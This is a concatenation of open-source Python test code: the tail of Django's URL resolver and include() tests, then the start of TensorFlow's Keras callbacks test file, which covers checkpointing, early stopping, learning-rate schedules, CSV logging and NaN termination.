self.callable_resolver = URLResolver(RegexPattern(r'^$'), urlconf_callables)
def test_named_handlers(self):
handler = (empty_view, {})
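        # resolve_error_handler() returns a (callback, kwargs) pair, hence the
        # expected 2-tuple above.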
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), handler)
def test_callable_handlers(self):
handler = (empty_view, {})
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.callable_resolver.resolve_error_handler(code), handler)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls_without_handlers')
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
msg = "I don't think I'm getting good value for this view"
with self.assertRaisesMessage(ValueError, msg):
self.client.get('/bad_view/')
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see valid patterns in the file then the issue is "
"probably caused by a circular import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get('/test/me/')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for path_, url_name, app_name, namespace, view_name, func, args, kwargs in resolve_test_data:
with self.subTest(path=path_):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path_)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path_)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get('/resolver_match/')
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, 'test-resolver-match')
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
def test_repr(self):
self.assertEqual(
repr(resolve('/no_kwargs/42/37/')),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, "
"args=('42', '37'), kwargs={}, url_name=no-kwargs, app_names=[], "
"namespaces=[], route=^no_kwargs/([0-9]+)/([0-9]+)/$)",
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.erroneous_urls')
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, 'view must be a callable'):
path('uncallable-object/', views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(get_callable('urlpatterns_reverse.views.empty_view'), empty_view)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.views.i_should_not_exist')
def test_attributeerror_not_hidden(self):
msg = 'I am here to confuse django.urls.get_callable'
with self.assertRaisesMessage(AttributeError, msg):
get_callable('urlpatterns_reverse.views_broken.i_am_broken')
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable('test')
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable('foo.bar')
def test_parent_module_does_not_exist(self):
msg = 'Parent module urlpatterns_reverse.foo does not exist.'
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.foo.bar')
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.tests.resolve_test_data')
class IncludeTests(SimpleTestCase):
url_patterns = [
path('inner/', views.empty_view, name='urlobject-view'),
re_path(r'^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='urlobject-view'),
re_path(r'^inner/\+\\\$\*/$', views.empty_view, name='urlobject-special-view'),
]
app_urls = URLObject('inc-app')
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
'Specifying a namespace in include() without providing an '
'app_name is not supported.'
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, 'namespace')
def test_include_4_tuple(self):
msg = 'Passing a 4-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace', 'blah'))
def test_include_3_tuple(self):
msg = 'Passing a 3-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'))
def test_include_3_tuple_namespace(self):
msg = 'Cannot override the namespace for a dynamic module that provides a namespace.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'), 'namespace')
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, 'app_name')),
(self.url_patterns, 'app_name', 'app_name')
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, 'app_name'), namespace='namespace'),
(self.url_patterns, 'app_name', 'namespace')
)
def test_include_app_name(self):
self.assertEqual(
include(self.app_urls),
(self.app_urls, 'inc-app', 'inc-app')
)
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, 'namespace'),
(self.app_urls, 'inc-app', 'namespace')
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
'/lookahead-/a-city/',
'/lookbehind-/a-city/',
'/lookahead+/a-city/',
'/lookbehind+/a-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {'city': 'a-city'})
def test_invalid_resolve(self):
test_urls = [
'/lookahead-/not-a-city/',
'/lookbehind-/not-a-city/',
'/lookahead+/other-city/',
'/lookbehind+/other-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'a-city'}, '/lookahead+/a-city/'),
('lookahead-negative', {'city': 'a-city'}, '/lookahead-/a-city/'),
('lookbehind-positive', {'city': 'a-city'}, '/lookbehind+/a-city/'),
('lookbehind-negative', {'city': 'a-city'}, '/lookbehind-/a-city/'),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'other-city'}),
('lookahead-negative', {'city': 'not-a-city'}),
('lookbehind-positive', {'city': 'other-city'}),
('lookbehind-negative', {'city': 'not-a-city'}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
    method_counts: dict. Contains the number of times each callback method
      was run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
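    # 5 training batches per epoch (10 samples / batch_size 2, or a Sequence
    # of length 5) over 5 epochs gives 25 train-batch hooks; the 4 validation
    # samples give 2 test batches per epoch, i.e. 10 test-batch hooks.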
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
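      # With the default patience of 0, training stops after the first epoch
      # once 'acc' fails to beat the baseline.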
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
    # This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
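      # The schedule receives the epoch index, so after 5 epochs the last lr
      # set is 1. / (1. + 4) = 0.2.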
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
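      # A fresh 'sgd' optimizer starts at the Keras default lr of 0.01;
      # halving it on each of the 2 epochs leaves 0.01 / 4.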
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
      # TODO(psv): Make sure the callback works correctly when min_delta is
      # set to 0. The test fails when the order of this callback and the
      # assertion below is interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
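    # val_loss never improves on the first epoch's value, so with patience=2
    # the lr is reduced at the end of the third epoch.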
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
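        # Yield real training batches for roughly the first 3 * len(x_train)
        # steps, then all-NaN batches so TerminateOnNaN stops training.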
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
          # On Windows, due to \r\n line endings, we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@test_util.run_deprecated_v1
def test_TensorBoard(self):
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
yield (x_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE:(i + 1) * BATCH_SIZE])
else:
yield (x_test[i * BATCH_SIZE:(i + 1) * BATCH_SIZE],
